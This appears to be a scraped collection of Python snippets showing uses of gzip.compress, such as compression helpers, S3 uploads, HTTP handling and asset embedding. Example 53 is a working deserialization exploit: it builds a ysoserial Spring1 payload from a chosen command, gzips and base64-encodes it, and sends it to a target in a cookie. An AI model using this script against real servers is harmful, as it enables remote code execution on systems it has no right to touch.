            rmtree(dirtmp)

        return True
Example no. 36
import asyncio
import gzip

import pytest
from multidict import CIMultiDict
from yarl import URL

import aiohttp
from aiohttp import web
from aiohttp.test_utils import TestClient as _TestClient
from aiohttp.test_utils import TestServer as _TestServer
from aiohttp.test_utils import (AioHTTPTestCase, loop_context,
                                make_mocked_request, setup_test_loop,
                                teardown_test_loop, unittest_run_loop)

_hello_world_str = "Hello, world"
_hello_world_bytes = _hello_world_str.encode('utf-8')
_hello_world_gz = gzip.compress(_hello_world_bytes)


def _create_example_app():
    @asyncio.coroutine
    def hello(request):
        return web.Response(body=_hello_world_bytes)

    @asyncio.coroutine
    def gzip_hello(request):
        return web.Response(body=_hello_world_gz,
                            headers={'Content-Encoding': 'gzip'})

    @asyncio.coroutine
    def websocket_handler(request):
Example no. 37
def parse_GET_Request(headers, cli, method=""):
    # TODO
    # Run tests
    logger.client_addr = cli

    params = {}
    for i in headers[1:]:
        try:
            headerField = i[:i.index(':')]
            if (headerField == "Accept"):
                parseContentType(i[i.index(':') + 2:len(i) - 1])
            params[headerField] = i[i.index(':') + 2:len(i) - 1]
        except:
            pass

    # Return 406 on not getting file with desired accept
    par = matchAccept()
    ctype = ""
    path = headers[0].split(' ')[1]
    if ('*/*' in par or 'text/html' in par):
        ctype = "text/html"
        if ('.' in path):
            extension = '.' + path.split('.')[1]
            if (extension != '.html'):
                f = getExtension(mediaTypes)
                if (extension == ".min"):
                    extension = ".js"
                ctype = f[extension]

    for i in par:
        file = path.split('.')[0] + '.' + i.split('/')[1]
        if os.path.exists(documentRoot + file):
            ctype = i
            break
    length = 0
    try:
        k = params['Accept']
    except:
        k = "*/*"
    if (ctype == ""):
        reqParams = {'code': 406, 'ctype': k, 'length': 0, 'etag': ''}

        res = generateGET(reqParams)
        logger.generateError(headers[0], res)
        return res, ""
    try:
        if (path == "/"):
            path = documentRoot + 'index.html'
        else:
            try:
                try:
                    extension = '.' + path.split('.')[1]
                except:
                    extension = '.' + ctype.split('/')[1]
                path = documentRoot + path
            except Exception as e:
                logger.ServerError(e)
                for i in par:
                    if (os.path.exists(documentRoot + i)):
                        ctype = i
                        break
        reqParams = {
            'length': 0,
            'code': 200,
            'ctype': ctype,
            'etag': '',
        }

        if ('.' not in path.split('\n')[-1]):
            path += '.' + ctype.split('/')[1]
        f = open(path, "rb")
        resource = f.read()
        lastModified = os.path.getmtime(path)
        Etag = generateEtag(lastModified, len(resource))
        try:
            length = len(resource)
        except:
            pass
        reqParams['etag'] = Etag
        reqParams['length'] = length
        if ('Cookie' in params.keys()):
            reqParams['Cookie'] = params['Cookie']

        if (method == "HEAD"):
            res = generateGET(reqParams)
            logger.generate(headers[0], res)
            print(res)
            return res, ""

        #415
        if ('Content-Encoding' in params.keys() and params['Content-Encoding']
                not in entityHeaders['Content-Encoding']):
            res = generateResponse(0, 415)
            f.close()
            logger.generateError(headers[0], res)
            return res, ""
        res = generateGET(reqParams)

        if ('If-None-Match' in params.keys()):
            e = Etag
            if (e == params['If-None-Match']):
                reqParams['code'] = 304
                reqParams['length'] = 0
                res = generateGET(reqParams)
                logger.generate(headers[0], res)

        # if ('If-Modified-Since' in params.keys()):
        #     # print(datetime(params['If-Modified-Since']))
        #     months = {
        #         'Jan' : 1,  'Feb' : 2,  'Mar' : 3, 'Apr' : 4,  'May' :5, 'Jun' : 6,
        #         'Jul' : 7,  'Aug' : 8, 'Sep' : 9, 'Oct' : 10,'Nov' : 11,  'Dec' : 12
        #     }
        #     l = params['If-Modified-Since'][5:].split(' ')
        #     timeString = l[3].split(':')
        #     hours, minutes, seconds = int(timeString[0]), int(timeString[1]), int(timeString[2])
        #     day, month, year  = int(l[0]), months[l[1]], int(l[2])
        #     time = datetime(year,month, day, hours, minutes, seconds)
        #     timeMillis = millis(time)
        #     print(lastModified, timeMillis)
        #     if(lastModified > timeMillis):
        #         reqParams['code'] = 304
        #         reqParams['length'] = 0
        #         res = generateGET(reqParams)
        #         logger.generate(headers[0],res)

        # Successful Content-Encoding
        if ('Accept-Encoding' in params.keys()):
            if (params['Accept-Encoding'] == 'gzip'):
                newres = ''
                for i in res.split('\r\n'):
                    if ('Content-Length' in i):
                        continue
                    else:
                        newres += i + '\r\n'
                resource = gzip.compress(resource)
                newres = newres[:len(newres) -
                                4] + 'Content-Length: {}\r\n'.format(
                                    len(resource)
                                ) + 'Accept-Encoding: gzip' + '\r\n\r\n'
                res = newres
            elif (params['Accept-Encoding'] == 'deflate'):
                newres = ''
                for i in res.split('\r\n'):
                    if ('Content-Length' in i):
                        continue
                    else:
                        newres += i + '\r\n'
                resource = zlib.compress(resource)
                newres = newres[:len(newres) -
                                4] + 'Content-Length: {}\r\n'.format(
                                    len(resource)
                                ) + 'Accept-Encoding: deflate' + '\r\n\r\n'
                res = newres
            elif (params['Accept-Encoding'] == 'br'):
                newres = ''
                for i in res.split('\r\n'):
                    if ('Content-Length' in i):
                        continue
                    else:
                        newres += i + '\r\n'
                newres = newres[:len(newres) -
                                4] + 'Content-Length: {}\r\n'.format(
                                    len(resource)
                                ) + 'Accept-Encoding: br' + '\r\n\r\n'
                res = newres

        #Check at end
        if ('Accept-Ranges' in params.keys()):
            k = int(params['Accept-Ranges'])
            resRange = resource[:k]
            newres = ''
            for i in res.split('\r\n'):
                if ('Content-Length' in i):
                    continue
                else:
                    newres += i + '\r\n'
            newres = newres[:len(newres) - 4] + 'Accept-Ranges: {}\r\n'.format(
                k) + 'Content-Length: {}'.format(k) + '\r\n\r\n'
            resource = resRange
            res = newres

        logger.generate(headers[0], res)
        # print(res)
        f.close()
        return res, resource

    except FileNotFoundError:
        reqParams['code'] = 404
        reqParams['length'] = 0
        res = generateGET(reqParams)
        logger.generate(headers[0], res)
        logger.generateError(headers[0], res)
        return res, ""
Example no. 38
def digest_string(string: str) -> str:
    return str(
        base64.encodebytes(
            gzip.compress(bytes(string, 'utf8'), compresslevel=9)),
        'utf8').replace('\n', '')
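An inverse is not shown in the example; a minimal sketch of one, assuming the digest is consumed by the same code base (the name is hypothetical):

import base64
import gzip

def undigest_string(digest: str) -> str:
    # Hypothetical inverse of digest_string(); base64.decodebytes is tolerant
    # of the newlines that digest_string stripped out.
    return gzip.decompress(base64.decodebytes(digest.encode('utf8'))).decode('utf8')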
Example no. 39
    def _compress(self, data: bytes) -> bytes:
        # no further compression or post processing is required
        if isinstance(self.request, Request) and not self.request.is_used:
            return data

        # otherwise there are two cases
        # 1. it is a lazy request, and being used, so `self.request.SerializeToString()` is a new uncompressed string
        # 2. it is a regular request, `self.request.SerializeToString()` is a uncompressed string
        # either way need compress
        if not self.envelope.compression.algorithm:
            return data

        ctag = CompressAlgo.from_string(self.envelope.compression.algorithm)

        if ctag == CompressAlgo.NONE:
            return data

        _size_before = sys.getsizeof(data)

        # lower than hwm, pass compression
        if (_size_before < self.envelope.compression.min_bytes
                or self.envelope.compression.min_bytes < 0):
            self.envelope.compression.algorithm = 'NONE'
            return data

        try:
            if ctag == CompressAlgo.LZ4:
                import lz4.frame

                c_data = lz4.frame.compress(data)
            elif ctag == CompressAlgo.BZ2:
                import bz2

                c_data = bz2.compress(data)
            elif ctag == CompressAlgo.LZMA:
                import lzma

                c_data = lzma.compress(data)
            elif ctag == CompressAlgo.ZLIB:
                import zlib

                c_data = zlib.compress(data)
            elif ctag == CompressAlgo.GZIP:
                import gzip

                c_data = gzip.compress(data)

            _size_after = sys.getsizeof(c_data)
            _c_ratio = _size_before / _size_after

            if _c_ratio > self.envelope.compression.min_ratio:
                data = c_data
            else:
                # compression rate is too bad, dont bother
                # save time on decompression
                default_logger.debug(
                    f'compression rate {(_size_before / _size_after):.2f}% '
                    f'is lower than min_ratio '
                    f'{self.envelope.compression.min_ratio}')
                self.envelope.compression.algorithm = 'NONE'
        except Exception as ex:
            default_logger.error(
                f'compression={str(ctag)} failed, fallback to compression="NONE". reason: {ex!r}'
            )
            self.envelope.compression.algorithm = 'NONE'

        return data
 def _compress(self, data):
     return gzip.compress(data)
Example no. 41
import sys
import os
import json
import concurrent.futures
import glob
import gzip
import pickle

import numpy as np
if '--to_vec' in sys.argv:
    book_vec = {}
    for line in open('model.vec'):
        line = line.strip()
        es = line.split(' ')
        book = es.pop(0)
        vec = [float(v) for v in es]
        #print( book, vec )
        book_vec[book] = vec

    open('book_vec.pkl.gz', 'wb').write(gzip.compress(pickle.dumps(book_vec)))


def _sim(arrs):
    arrs, index_book, books, vecs = arrs
    allnorms = np.linalg.norm(vecs, axis=(1, ))
    book_sims = {}
    for i in arrs:
        vec = vecs[i]
        book = books[i]
        if os.path.exists('sims/{}.json'.format(book)) is True:
            print('already processed', book)
            continue
        print(i, '/', size, book)
        norm = np.linalg.norm(vec) * allnorms
        invnorm = norm**-1
            shutil.copyfile(
                m_path,
                dest_path + j + "/" + s_folder + "_3T_" + j + ".nii.gz")

            print(dest_path + j + "/" + s_folder + "_3T_" + j + ".nii.gz")

            print(
                "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
            )
        elif os.path.exists(mn_path):
            print(" NII file exists   ")
            print(" =================")

            shutil.copyfile(
                mn_path, dest_path + j + "/" + s_folder + "_3T_" + j + ".nii")
            gzip.compress(dest_path + j + "/" + s_folder + "_3T_" + j + ".nii")

            if os.path.exists(dest_path + j + "/" + s_folder + "_3T_" + j +
                              ".nii.gz"):
                print(dest_path + j + "/" + s_folder + "_3T_" + j +
                      ".nii.gz      EXISTS")
            print(
                "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
            )

        else:
            print(
                "----------------------- Following data are missing ---------------------------"
            )
            print("data: ", s_folder + "_3T_" + j + ".nii.gz")
            print("fMRI folder: ",
Example no. 43
 def compress(self, data: bytes) -> bytes:
     return gzip.compress(data, compresslevel=self.compresslevel)
Example no. 44
def encode_msg(msg: Union[Request, Response]):
    """Encode the message's body"""
    if msg.headers.get('content-encoding', '') == 'gzip':
        msg.body = gzip.compress(msg.body)
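A decoding counterpart would look symmetric; this sketch is an assumption, mirroring the original's in-place style:

import gzip

def decode_msg(msg):
    # Hypothetical counterpart to encode_msg(): decompress a gzip-encoded body in place.
    if msg.headers.get('content-encoding', '') == 'gzip':
        msg.body = gzip.decompress(msg.body)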
Example no. 45
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'ipetrash'

s_in = "HelloWorld!" * 1000000
s_in = bytes(s_in, encoding='utf-8')
print(len(s_in))  # 11000000

import gzip
s_out = gzip.compress(s_in)
assert gzip.decompress(s_out) == s_in
print(len(s_out))  # 21396
port = 12345
s.bind((host, port))

# establish connection
s.listen(5)
c, addr = s.accept()
print('Connection from ', addr)
c.send('Thank you for connecting'.encode())
print(c.recv(1024))

while True:
    # take picture and store as jpeg
    with picamera.PiCamera() as cam:
        cam.capture('image.jpeg', resize=(160, 90), quality=9)

    # encode jpeg image into bytes
    with open('image.jpeg', 'rb') as image:
        read_image = image.read()
    encoded_image = base64.encodebytes(read_image)

    # compress image
    compressed_image = gzip.compress(encoded_image)
    with gzip.open('/home/pi/Documents/ECE_387/image.jpeg.gz', 'wb') as zip:
        zip.write(compressed_image)

    c.send(compressed_image)
    # print(sys.getsizeof(encoded_image))
    print(sys.getsizeof(compressed_image))
    c.recv(1024)

c.close()
Example no. 47
def heap_profile(client: Client) -> bytes:
    """Returns a gzipped pprof protocol buffer containing a heap profile."""
    return gzip.compress(client.heap_profile())
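A possible way to persist the returned profile (the file name and how the client is obtained are assumptions); pprof-style tooling accepts gzip-compressed protocol buffer profiles directly, so the bytes can be written to disk as-is:

# Hypothetical usage: write the gzipped heap profile to disk for later analysis.
profile = heap_profile(client)  # obtaining `client` is outside this example
with open('heap.pb.gz', 'wb') as fh:
    fh.write(profile)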
Example no. 48
def make_file_object(hash, path, data, attributes):
    global config

    index = attributes['index']
    actions = attributes['actions']
    flags = 0
    compression = ESPFS_COMPRESSION_NONE
    initial_data = data
    initial_len = len(data)

    if 'cache' in actions:
        flags |= ESPFS_FLAG_CACHE

    for action in actions:
        if action in config['preprocessors']:
            command = config['preprocessors'][action]['command']
            process = subprocess.Popen(command,
                                       stdin=subprocess.PIPE,
                                       stdout=subprocess.PIPE,
                                       shell=True)
            data = process.communicate(input=data)[0]

    file_data = data
    file_len = len(data)

    if file_len >= initial_len:
        data = initial_data
        file_len = initial_len

    if 'gzip' in actions:
        flags |= ESPFS_FLAG_GZIP
        level = config['compressors']['gzip']['level']
        level = min(max(level, 0), 9)
        data = gzip.compress(data, level)
    elif 'heatshrink' in actions:
        compression = ESPFS_COMPRESSION_HEATSHRINK
        window_sz2 = config['compressors']['heatshrink']['window_sz2']
        lookahead_sz2 = config['compressors']['heatshrink']['lookahead_sz2']
        data = espfs_heatshrink_header_t.pack(
            window_sz2, lookahead_sz2, 0) + heatshrink2.compress(
                data, window_sz2=window_sz2, lookahead_sz2=lookahead_sz2)

    data_len = len(data)

    if data_len >= file_len:
        flags &= ~ESPFS_FLAG_GZIP
        compression = ESPFS_COMPRESSION_NONE
        data = file_data
        data_len = file_len

    if initial_len < 1024:
        initial_len_str = '%d B' % (initial_len)
        data_len_str = '%d B' % (data_len)
    elif initial_len < 1024 * 1024:
        initial_len_str = '%.1f KiB' % (initial_len / 1024)
        data_len_str = '%.1f KiB' % (data_len / 1024)
    else:
        initial_len_str = '%.1f MiB' % (initial_len / 1024 / 1024)
        data_len_str = '%.1f MiB' % (data_len / 1024 / 1024)

    percent = 100.0
    if initial_len > 0:
        percent = data_len / initial_len * 100.0

    stats = '%-9s -> %-9s (%.1f%%)' % (initial_len_str, data_len_str, percent)
    print('%08x %-34s file %s' % (hash, path, stats))

    path = path.encode('utf8') + b'\0'
    path = path.ljust((len(path) + 3) // 4 * 4, b'\0')
    data = data.ljust((data_len + 3) // 4 * 4, b'\0')
    header = espfs_object_header_t.pack(
        ESPFS_TYPE_FILE, espfs_object_header_t.size + espfs_file_header_t.size,
        index, len(path), 0) + espfs_file_header_t.pack(
            data_len, file_len, flags, compression, 0)

    return header + path + data
Example no. 49
def compress_string(data):
    return gzip.compress(data.encode("utf-8"))
    id_tables = FirestoreUuidInfrastructure.init_from_credentials(firestore_uuid_table_credentials)
    if len(table_names) == 0:
        table_names = id_tables.list_table_names()
    log.info(f"Found {len(table_names)} uuid tables to export")

    export = dict()  # of table_name -> {mappings: dict of data -> uuid}
    for i, table_name in enumerate(table_names):
        log.info(f"Fetching mappings from table {i + 1}/{len(table_names)}: {table_name}...")
        mappings = id_tables.get_table(table_name, None).get_all_mappings()
        export[table_name] = {
            "mappings": mappings
        }
        log.info(f"Fetched {len(mappings)} mappings")

    log.info(f"Converting fetched data to zipped json for export...")
    json_blob = json.dumps(export)
    export_compressed = gzip.compress(bytes(json_blob, "utf-8"))

    if gzip_export_file_path is not None:
        log.warning(f"Writing mappings to local disk at '{gzip_export_file_path}'...")
        with open(gzip_export_file_path, "wb") as f:
            f.write(export_compressed)

    if gcs_upload_path is not None:
        log.info(f"Uploading the mappings to {gcs_upload_path}...")
        google_cloud_utils.upload_string_to_blob(google_cloud_credentials_file_path, gcs_upload_path,
                                                 export_compressed)

    log.info(f"Export complete ({len(table_names)} table(s))")
Example no. 51
def compress(stream):
    return gzip.compress(stream) if stream else None
Example no. 52
    def save_timetables(self, save_to_s3=False, skip_existing=False):
        agency_id = self.agency_id

        dates_map = self.get_services_by_date()

        #
        # Typically, many dates have identical scheduled timetables (with times relative to midnight on that date).
        # Instead of storing redundant timetables for each date, store one timetable per route for each unique set of service_ids.
        # Each stored timetable is named with a string 'key' which is unique for each set of service_ids.
        #
        # A "date_keys" JSON object is stored in S3 and the local cache which maps dates to keys.
        #
        # Although the keys could be any string that is legal in paths, for ease of browsing, the keys are chosen to be
        # the string representation of one date with that set of service_ids.

        first_date_for_service_ids_map = {}

        try:
            old_date_keys = timetables.get_date_keys(agency_id)
        except FileNotFoundError as err:
            old_date_keys = {}

        date_keys = old_date_keys.copy()

        for d, service_ids in dates_map.items():
            service_ids = sorted(service_ids)
            service_ids_key = json.dumps(service_ids)
            if service_ids_key not in first_date_for_service_ids_map:
                first_date_for_service_ids_map[service_ids_key] = d

            date_keys[str(d)] = str(
                first_date_for_service_ids_map[service_ids_key])

        if skip_existing and date_keys == old_date_keys:
            print("No new dates in GTFS feed, skipping")
            return

        trips_df = self.get_gtfs_trips()

        gtfs_route_id_map = {}

        route_configs = routeconfig.get_route_list(
            self.agency_id
        )  # todo: use route config from parsing this GTFS file (will eventually be needed to process old GTFS feeds)
        for route_config in route_configs:
            gtfs_route_id_map[route_config.gtfs_route_id] = route_config

        for gtfs_route_id, route_trips in trips_df.groupby('route_id'):
            if gtfs_route_id not in gtfs_route_id_map:
                continue

            route_config = gtfs_route_id_map[gtfs_route_id]

            arrivals_by_service_id = {}
            trip_ids_map = {}

            for service_id, service_route_trips in route_trips.groupby(
                    'service_id'):
                arrivals_by_service_id[
                    service_id] = self.get_scheduled_arrivals_by_service_id(
                        service_id, route_config, service_route_trips,
                        trip_ids_map)

            for service_ids_json, d in first_date_for_service_ids_map.items():
                service_ids = json.loads(service_ids_json)

                # merge scheduled arrivals for all service_ids that are in service on the same date
                merged_arrivals = {}

                for service_id in service_ids:
                    if service_id not in arrivals_by_service_id:
                        continue

                    service_id_arrivals = arrivals_by_service_id[service_id]

                    for dir_id, direction_arrivals in service_id_arrivals.items(
                    ):
                        if dir_id not in merged_arrivals:
                            merged_arrivals[dir_id] = {}

                        direction_merged_arrivals = merged_arrivals[dir_id]

                        for stop_id, stop_arrivals in direction_arrivals.items(
                        ):

                            if stop_id not in direction_merged_arrivals:
                                direction_merged_arrivals[stop_id] = []

                            direction_merged_arrivals[stop_id] = sorted(
                                direction_merged_arrivals[stop_id] +
                                stop_arrivals,
                                key=lambda arr: arr['t'])

                date_key = str(d)

                cache_path = timetables.get_cache_path(agency_id,
                                                       route_config.id,
                                                       date_key)
                Path(cache_path).parent.mkdir(parents=True, exist_ok=True)

                data_str = json.dumps(
                    {
                        'version': timetables.DefaultVersion,
                        'agency': agency_id,
                        'route_id': route_config.id,
                        'date_key': date_key,
                        'timezone_id': self.agency.timezone_id,
                        'service_ids': service_ids,
                        'arrivals': merged_arrivals,
                    },
                    separators=(',', ':'))

                with open(cache_path, "w") as f:
                    f.write(data_str)

                if save_to_s3:
                    s3_path = timetables.get_s3_path(agency_id,
                                                     route_config.id, date_key)
                    s3 = boto3.resource('s3')
                    s3_bucket = config.s3_bucket
                    print(f'saving to s3://{s3_bucket}/{s3_path}')
                    object = s3.Object(s3_bucket, s3_path)
                    object.put(Body=gzip.compress(bytes(data_str, 'utf-8')),
                               CacheControl='max-age=86400',
                               ContentType='application/json',
                               ContentEncoding='gzip',
                               ACL='public-read')

        # save date keys last, so that if an error occurs while saving timetables,
        # the timetables will be saved again even with skip_existing=True

        date_keys_cache_path = timetables.get_date_keys_cache_path(agency_id)

        Path(date_keys_cache_path).parent.mkdir(parents=True, exist_ok=True)

        data_str = json.dumps(
            {
                'version': timetables.DefaultVersion,
                'date_keys': {
                    date_str: date_key
                    for date_str, date_key in date_keys.items()
                },
            },
            separators=(',', ':'))

        with open(date_keys_cache_path, "w") as f:
            f.write(data_str)

        if save_to_s3:
            s3 = boto3.resource('s3')
            s3_path = timetables.get_date_keys_s3_path(agency_id)
            s3_bucket = config.s3_bucket
            print(f'saving to s3://{s3_bucket}/{s3_path}')
            object = s3.Object(s3_bucket, s3_path)
            object.put(Body=gzip.compress(bytes(data_str, 'utf-8')),
                       CacheControl='max-age=86400',
                       ContentType='application/json',
                       ContentEncoding='gzip',
                       ACL='public-read')
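# A minimal sketch (not part of the example above) of reading back one of the timetable
# objects saved with ContentEncoding='gzip'; the bucket and key below are illustrative only.
import gzip
import json

import boto3

s3 = boto3.resource('s3')
obj = s3.Object('example-timetables-bucket', 'timetables/example-agency/route_1/2020-03-14.json.gz')
body = obj.get()['Body'].read()
# boto3 returns the stored bytes as-is (unlike an HTTP client honoring Content-Encoding),
# so the gzip layer is removed explicitly before parsing the JSON.
timetable = json.loads(gzip.decompress(body).decode('utf-8'))
print(timetable['date_key'], len(timetable['arrivals']))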
Esempio n. 53
0
command = sys.argv[1]

payload = "{}".format(command)
print("[*] Creating payload: {}".format(payload))
if os.path.exists(payload_file):
    os.remove(payload_file)
os.popen(
    "java -jar ./ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar Spring1 \"{}\" > {}"
    .format(payload, payload_file))
time.sleep(5)

with open(payload_file, "rb") as f:
    malicious_payload = f.read()

print("[*] Malicious payload is: {}".format(malicious_payload))

compressed_malicious_bytes = gzip.compress(malicious_payload)
print("[*] Compressed malicious bytes are: {}".format(
    compressed_malicious_bytes))

base64_compressed_malicious_payload = base64.b64encode(
    compressed_malicious_bytes).decode("ascii")
print("[*] Base64 compressed malicious string is: {}".format(
    base64_compressed_malicious_payload))

print("[*] Sending request.")
cookies = dict(counter="\"{}\"".format(base64_compressed_malicious_payload))
page = requests.get(url, headers=headers, cookies=cookies)

print("[*] Response received:\n\n{}".format(page.text))
Esempio n. 54
0
    def create_cloudwatch_log_event_from_data(self, data):
        # CloudWatch log event data is base64-encoded and gzip-compressed
        # see https://docs.aws.amazon.com/lambda/latest/dg/services-cloudwatchlogs.html
        gzipped_data = gzip.compress(bytes(data, encoding="utf-8"))
        encoded_data = base64.b64encode(gzipped_data).decode("utf-8")
        return f'{{"awslogs": {{"data": "{encoded_data}"}}}}'
Esempio n. 55
0
# This embeds all of the assets into a .go file by gzip-compressing the contents
# and then encoding them as base64 string constants.

import gzip
import os
import base64

#Read in all the file data and compress
data = {}
for root, dirs, files in os.walk(".", topdown=True):
    for file_name in files:
        if file_name.endswith((".png", ".wav", ".ogg")):
            # Use the full path so assets in subdirectories are found as well.
            file_path = os.path.join(root, file_name)
            with open(file_path, "rb") as fin:
                root_name, extension = os.path.splitext(file_name)
                key_name = extension.upper().strip(".") + "_" + root_name.upper()
                data[key_name] = gzip.compress(fin.read())
                print("Read", file_path, "into", key_name)

#Write as a string constant in a .go file
with open("assets.go", "w", encoding='utf-8') as fout:
    fout.write("package assets\n")
    for key in data:
        fout.write("const " + key + '="')
        fout.write(base64.b64encode(
            data[key]).decode("utf-8"))  #Binary content is base64 encoded
        fout.write('"\n')
Esempio n. 56
0
def fetch_action(namespace):

    # Are we resuming
    resuming = namespace.resume

    if resuming and not namespace.output:
        die(['Cannot --resume without specifying -o/--output.'])

    # Do we need to fetch only a single url?
    single_url = namespace.file is sys.stdin and is_url(namespace.column)

    if single_url:
        edit_namespace_with_csv_io(namespace, 'url')

        # If we are hitting a single url we enable contents_in_report
        if namespace.contents_in_report is None:
            namespace.contents_in_report = True

    # HTTP method
    http_method = namespace.method

    # Cookie grabber
    get_cookie = None
    if namespace.grab_cookies:
        get_cookie = grab_cookies(namespace.grab_cookies)

    # Global headers
    global_headers = None
    if namespace.headers:
        global_headers = {}

        for header in namespace.headers:
            k, v = parse_http_header(header)
            global_headers[k] = v

    flag = 'w'
    if namespace.output is not None and resuming and isfile(namespace.output):
        flag = 'r+'

    output_file = open_output_file(namespace.output, flag=flag)

    # Resume listener
    listener = None
    resuming_reader_loading = None
    skipped = 0

    if resuming:
        resuming_reader_loading = tqdm(desc='Resuming',
                                       dynamic_ncols=True,
                                       unit=' lines')

        def listener(event, row):
            nonlocal skipped

            if event == 'resume.output':
                resuming_reader_loading.update()

            if event == 'resume.input':
                skipped += 1
                loading_bar.set_postfix(skipped=skipped)
                loading_bar.update()

    # Enricher
    enricher = casanova.threadsafe_enricher(
        namespace.file,
        output_file,
        resumable=resuming,
        auto_resume=False,
        add=OUTPUT_ADDITIONAL_HEADERS +
        (['raw_contents'] if namespace.contents_in_report else []),
        keep=namespace.select,
        listener=listener)

    if namespace.column not in enricher.pos:
        die([
            'Could not find the "%s" column containing the urls in the given CSV file.'
            % namespace.column
        ])

    url_pos = enricher.pos[namespace.column]

    filename_pos = None

    if namespace.filename is not None:
        if namespace.filename not in enricher.pos:
            die([
                'Could not find the "%s" column containing the filenames in the given CSV file.'
                % namespace.filename
            ])

        filename_pos = enricher.pos[namespace.filename]

    indexed_input_headers = {h: i for i, h in enumerate(enricher.fieldnames)}

    if resuming:
        enricher.resume()
        resuming_reader_loading.close()

    # Loading bar
    total = namespace.total

    loading_bar = tqdm(desc='Fetching pages',
                       total=total,
                       dynamic_ncols=True,
                       unit=' urls')

    def url_key(item):
        url = item[1][url_pos].strip()

        if not url:
            return

        # Url templating
        if namespace.url_template:
            return namespace.url_template.format(value=url)

        return url

    def request_args(url, item):
        cookie = None

        # Cookie
        if get_cookie:
            cookie = get_cookie(url)

        # Headers
        headers = None

        if global_headers:
            headers = global_headers

        return {'method': http_method, 'cookie': cookie, 'headers': headers}

    def write_output(index,
                     row,
                     resolved=None,
                     status=None,
                     error=None,
                     filename=None,
                     encoding=None,
                     data=None):

        addendum = [
            resolved or '', status or '', error or '', filename or '', encoding
            or ''
        ]

        if namespace.contents_in_report:
            addendum.append(data or '')

        enricher.writerow(index, row, addendum)

    errors = 0
    status_codes = Counter()

    fetch_kwargs = {
        'threads': namespace.threads,
        'throttle': namespace.throttle,
        'domain_parallelism': namespace.domain_parallelism
    }

    if namespace.timeout is not None:
        fetch_kwargs['timeout'] = namespace.timeout

    multithreaded_iterator = multithreaded_fetch(enricher,
                                                 key=url_key,
                                                 request_args=request_args,
                                                 **fetch_kwargs)

    for result in multithreaded_iterator:
        index, row = result.item

        if not result.url:

            write_output(index, row)

            loading_bar.update()
            continue

        response = result.response
        data = response.data if response is not None else None

        content_write_flag = 'wb'

        # Updating stats
        if result.error is not None:
            errors += 1
        else:
            if response.status >= 400:
                status_codes[response.status] += 1

        postfix = {'errors': errors}

        for code, count in status_codes.most_common(1):
            postfix[str(code)] = count

        loading_bar.set_postfix(**postfix)
        loading_bar.update()

        # No error
        if result.error is None:

            filename = None

            # Building filename
            if data:
                if filename_pos is not None or namespace.filename_template:
                    if namespace.filename_template:
                        filename = CUSTOM_FORMATTER.format(
                            namespace.filename_template,
                            value=row[filename_pos]
                            if filename_pos is not None else None,
                            ext=result.meta['ext'],
                            line=LazyLineDict(indexed_input_headers, row))
                    else:
                        filename = row[filename_pos] + result.meta['ext']
                else:
                    # NOTE: it would be nice to have an id that can be sorted by time
                    filename = str(uuid4()) + result.meta['ext']

            # Standardize encoding?
            encoding = result.meta['encoding']

            if data and (namespace.standardize_encoding or namespace.contents_in_report):
                if encoding is None or encoding != 'utf-8' or namespace.contents_in_report:
                    data = data.decode(
                        encoding if encoding is not None else 'utf-8',
                        errors='replace')
                    encoding = 'utf-8'
                    content_write_flag = 'w'

            # Writing file on disk
            if data and not namespace.contents_in_report:

                if namespace.compress:
                    filename += '.gz'

                resource_path = join(namespace.output_dir, filename)
                resource_dir = dirname(resource_path)

                os.makedirs(resource_dir, exist_ok=True)

                with open(resource_path, content_write_flag) as f:

                    # TODO: what if standardize_encoding + compress?
                    f.write(
                        gzip.compress(data) if namespace.compress else data)

            # Reporting in output
            resolved_url = response.geturl()

            write_output(
                index,
                row,
                resolved=resolved_url if resolved_url != result.url else None,
                status=response.status,
                filename=filename,
                encoding=encoding,
                data=data)

        # Handling potential errors
        else:
            error_code = report_error(result.error)

            write_output(index, row, error=error_code)

    # Closing files
    output_file.close()
Esempio n. 57
0
import glob
import json
import pickle
import gzip
import os
import hashlib
import re

names = set([name.split('/').pop() for name in glob.glob('hrefs/*')])

urls = set()
for name in names:
    print(name)
    try:
        with open('hrefs/' + name) as f:
            obj = json.loads(f.read())
    except (OSError, ValueError):
        continue
    for url in obj:
        if hashlib.sha256(bytes(url, 'utf8')).hexdigest() not in names:
            urls.add(re.sub(r'\?.*?$', '', url))
    if len(urls) >= 100000:
        break

with open('urls.pkl.gz', 'wb') as f:
    f.write(gzip.compress(pickle.dumps(urls)))
Esempio n. 58
0
def apply_temple(project,
                 temple_args,
                 temple_content,
                 data_json,
                 data_key,
                 send_at=None,
                 group_id=None,
                 owner='system'):
    # Fills the template with content (one record at a time); when temple_args['add_on_func']['required'] is True, an extra ETL function is also run to substitute the corresponding values.
    func_result = None
    read_tracker = {
        "distinct_id": data_key,
        "event": "recall",
        "lib": {
            "$lib": "noti"
        },
        "project": project,
        "properties": {
            "$latest_utm_campaign": "___utm_campaign___",
            "$latest_utm_content": "___utm_content___",
            "$latest_utm_medium": "___utm_medium___",
            "$latest_utm_source": "___utm_source___",
            "$latest_utm_term": "___utm_term___",
            "$lib": "noti",
            "_latest_utm_email": "___email___",
            "_latest_utm_mobile": "___mobile___",
            "action": 2,
            "sent_time": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(send_at))
        },
        "type": "track"
    }
    data_json['group_id'] = group_id
    if 'add_on_func' in temple_args and 'required' in temple_args[
            'add_on_func'] and temple_args['add_on_func']['required'] is True:
        py = importlib.import_module(temple_args['add_on_func']['dir'])
        ff = getattr(py, temple_args['add_on_func']['name'])
        func_result = ff(data_json)
    for l in temple_content:
        for t in read_tracker['properties']:
            temple_content[l] = temple_content[l].replace('___owner___', owner)
            read_tracker['properties'][t] = str(
                read_tracker['properties'][t]).replace('___owner___', owner)
            for i in temple_args['args']:
                temple_content[l] = temple_content[l].replace(
                    '___' + i + '___', str(temple_args['args'][i]))
                read_tracker['properties'][t] = str(
                    read_tracker['properties'][t]).replace(
                        '___' + i + '___', str(temple_args['args'][i]))
            for d in data_json:
                temple_content[l] = temple_content[l].replace(
                    '___' + d + '___', str(data_json[d])).replace(
                        '___etl_date___',
                        time.strftime("%Y-%m-%d", time.localtime(send_at)))
                read_tracker['properties'][t] = str(
                    read_tracker['properties'][t]).replace(
                        '___' + d + '___', str(data_json[d])).replace(
                            '___etl_date___',
